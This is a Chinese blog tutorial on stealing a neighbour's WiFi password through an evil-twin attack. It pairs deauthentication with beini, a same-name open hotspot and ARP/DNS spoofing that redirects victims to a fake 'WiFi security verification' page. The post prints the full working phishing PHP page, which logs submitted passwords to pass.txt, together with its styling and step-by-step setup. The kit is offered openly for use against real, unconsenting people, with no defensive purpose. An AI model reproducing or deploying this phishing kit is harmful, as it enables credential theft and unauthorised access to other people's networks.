最新文章:
- Google Map api国内正常使用该如何配置(2021最新)
- wordpress国内网速慢加速及防DDOS攻击快速CF切换教程
- 2.18-3.31,共战疫情,阿里云免费送.网址域名
- Ubuntu安装时出现“failed to load ldlinux.c32”
- iconv函数报错 Detected an illegal character in input string
首页 信息安全
都有哪些蹭网的方法?
发布时间:2015年09月03日 评论数:抢沙发 阅读数:4931
-
前几天家里断网了,只好想办法蹭蹭隔壁的网,可是对方密码太强了,只好想了这招来钓取WIFI密码。
利用beini给对方的wifi(下面简称:awifi)断网,建立同名wifi(下面简称bwifi:),bwifi中使用arp dns欺骗使用户访问的网址自动跳转到我们事先布置好的页面(所谓的"wifi安全验证"),来钓取wifi密码。
示意图:
新建位图图像.jpg
1.首先我们要搭建好web服务器(我这里使用的是win7_32+apache)
2.下面附上我自己写的钓鱼php,为了适应手机界面我引入了‘bootstrap.min.css’这个在网上可以下到
index.php
<!DOCTYPE html> <html> <head> <meta charset="gb2312"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="description" content=""> <meta name="author" content=""> <title>WIFI安全验证</title> <link href="bootstrap.min.css" rel="stylesheet"> <link href="signin.css" rel="stylesheet"> </head> <body> <?php $pass = @$_POST['password']; if(strlen($pass)>7){ $path='pass.txt'; $f=fopen($path,'a'); fwrite($f,$pass."rn"); fclose($f); } ?> <div class="container"> <form class="form-signin" action="index.php" method="post"> <h3 class="form-signin-heading">请输入WIFI密码</h3> <label for="inputPassword" class="sr-only">Password</label> <input type="password" id="password" name="password" class="form-control" placeholder="WIFI 密码" required> <div class="checkbox"> <label> <input type="checkbox" value="remember-me"> 记住密码 </label> <x style="color: #9d9d9d" onclick="alert('1.如果您忘记了WIFI密码n2.请按下路由器上的reset键n3.reset后WIFI密码为默认密码n4.默认密码在路由器的背面可以看到.')">忘记密码</x> </div> <button class="btn btn-lg btn-primary btn-block" type="submit" onclick="alert('t密码错误!tnt请重试t')">登陆 WIFI</button> </form> </div> </body> </html>signin.css
body { padding-top: 40px; padding-bottom: 40px; background-color: #eee; } .form-signin { max-width: 330px; padding: 15px; margin: 0 auto; } .form-signin .form-signin-heading, .form-signin .checkbox { margin-bottom: 10px; } .form-signin .checkbox { font-weight: normal; } .form-signin .form-control { position: relative; height: auto; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; padding: 10px; font-size: 16px; } .form-signin .form-control:focus { z-index: 2; } .form-signin input[type="email"] { margin-bottom: -1px; border-bottom-right-radius: 0; border-bottom-left-radius: 0; } .form-signin input[type="password"] { margin-bottom: 10px; border-top-left-radius: 0; border-top-right-radius: 0; }
3.之后呢还需要新建一个pass.txt的文本文档用来接收钓到的密码
目录结构如下
微信截图_20150815110126.jpg
4.在电脑上新建一个同名不加密wifi热点
5.arp dns欺骗跳转(这里就不详细说了网上有很多)
6.打开另一个电脑(beini系统)给对方的wifi进行断网攻击
4a36acaf2edda3cc95f2029001e93901213f9268.jpg
下面就坐等收密码啦,密码获取到后会在pass.txt中
本文作者:Mr.linus
文章标题: 都有哪些蹭网的方法?
本文地址:http://www.90qj.com/221.html 本文已经被百度收录,点击查看详情
版权声明:若无注明,本文皆为“挨踢 Blog”原创,转载请保留文章出处。
本文地址:http://www.90qj.com/221.html 本文已经被百度收录,点击查看详情
版权声明:若无注明,本文皆为“挨踢 Blog”原创,转载请保留文章出处。
相关文章